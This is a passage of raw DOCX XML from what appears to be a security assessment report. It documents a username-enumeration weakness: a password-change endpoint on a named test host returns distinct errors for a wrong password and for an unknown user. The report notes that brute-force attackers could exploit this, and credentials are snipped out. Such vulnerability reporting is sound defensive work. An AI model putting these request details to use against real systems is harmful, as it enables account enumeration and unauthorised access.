                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>": "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>jtracing</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>",</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="3C17A24A"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rPr>
                    <w:t xml:space="preserve">  "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>currentPassword</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">": </w:t>
                  </w:r>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>,</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="71B9B7EA"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rPr>
                    <w:t xml:space="preserve">  "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>newPassword</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">": </w:t>
                  </w:r>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="7CD16D56"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rPr>
                    <w:t>}</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="3BD9F644" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="001C6C1B" w:rsidRDefault="002B7238" w:rsidP="002B7238">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C6C1B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP Response 1:</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="002B7238" w:rsidRPr="001E6A26" w14:paraId="158A1AC3" w14:textId="77777777" w:rsidTr="002B7238">
              <w:trPr>
                <w:trHeight w:val="1160"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="33C95EE1"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highlight w:val="yellow"/>
                    </w:rPr>
                    <w:lastRenderedPageBreak/>
                    <w:t>HTTP/1.1 200 OK</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4F499EDA"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rPr>
                    <w:t>Date: Wed, 29 May 2019 19:57:42 GMT</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="565FE51D"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highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="37E57429"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rPr>
                    <w:t>Content-Length: 57</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="78A60E93"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rPr>
                    <w:t>{"</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>errorMessage</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>":"WRONGCURRPASSWORD</w:t>
                  </w:r>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>","</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>changeStatus</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>":false}</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="6E3159F8" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="001C6C1B" w:rsidRDefault="002B7238" w:rsidP="002B7238">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C6C1B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP Request 2 (invalid username):</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="002B7238" w:rsidRPr="001E6A26" w14:paraId="14A32153" w14:textId="77777777" w:rsidTr="002B7238">
              <w:trPr>
                <w:trHeight w:val="2614"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="76556298"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rPr>
                    <w:t>POST /</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>paymentgateway</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>loginservices</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/v1/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>gbd</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/account/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>changePassword</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> HTTP/1.1</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="44B469D0"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rPr>
                    <w:t>Host: payment.sit2.va.anthem.com</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="584C2F7F"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highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="7DC6FA4B" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="001E6A26" w:rsidRDefault="002B7238" w:rsidP="002B7238">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Referer</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>: https://payment.sit2.va.anthem.com/</w:t>
                  </w:r>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>gofundhip/resetpassword</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="557D034F"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highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="37F4D57A"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rPr>
                    <w:t>Cache-Control: no-cache</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="46AE72C0"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rPr>
                    <w:t>{</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="2D7509E4"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rPr>
                    <w:t xml:space="preserve">  "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>userName</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>": "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>Testaccountforpassword</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>",</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="7E093702"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rPr>
                    <w:t xml:space="preserve">  "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>currentPassword</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">": </w:t>
                  </w:r>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>,</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="429036FF" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="001E6A26" w:rsidRDefault="002B7238" w:rsidP="002B7238">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">  "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>newPassword</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">": </w:t>
                  </w:r>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="319AA470" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="001E6A26" w:rsidRDefault="002B7238" w:rsidP="002B7238">
                  <w:pPr>
                    <w:spacing w:before="120" w:after="120"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>}</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="51422F50" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="001C6C1B" w:rsidRDefault="002B7238" w:rsidP="002B7238">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C6C1B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP Response 2:</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="002B7238" w:rsidRPr="001C6C1B" w14:paraId="549F7672" w14:textId="77777777" w:rsidTr="002B7238">
              <w:trPr>
                <w:trHeight w:val="1250"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="731DF8CF" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="001C6C1B" w:rsidRDefault="002B7238" w:rsidP="002B7238">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="001C6C1B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>HTTP/1.1 200 OK</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="5FDF1ADA" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="001C6C1B" w:rsidRDefault="002B7238" w:rsidP="002B7238">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="001C6C1B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Date: Wed, 29 May 2019 20:00:33 GMT</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="0D160E91" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="001C6C1B" w:rsidRDefault="002B7238" w:rsidP="002B7238">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="001C6C1B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="22397D56" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="001C6C1B" w:rsidRDefault="002B7238" w:rsidP="002B7238">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="001C6C1B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Content-Length: 52</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="128A099D" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="001C6C1B" w:rsidRDefault="002B7238" w:rsidP="002B7238">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="001C6C1B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>{"</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="001C6C1B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>errorMessage</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="001C6C1B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>":"USERNOTFOUND</w:t>
                  </w:r>
                  <w:r w:rsidRPr="001C6C1B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>","</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="001C6C1B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>changeStatus</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="001C6C1B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>":false}</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="69C4ECD0" w14:textId="77777777" w:rsidR="009208B5" w:rsidRDefault="009208B5" w:rsidP="009208B5">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">The below HTTP request and response demonstrates the applications error message being sent through the system. An attacker may capture this information and analyst it during a brute force attack to gain member information. This includes Member ID, First Name, Last Name, and Date of Birth. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42BDE657" w14:textId="20741BBE" w:rsidR="009208B5" w:rsidRPr="00DC7110" w:rsidRDefault="009208B5" w:rsidP="009208B5">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC7110">
              <w:rPr>
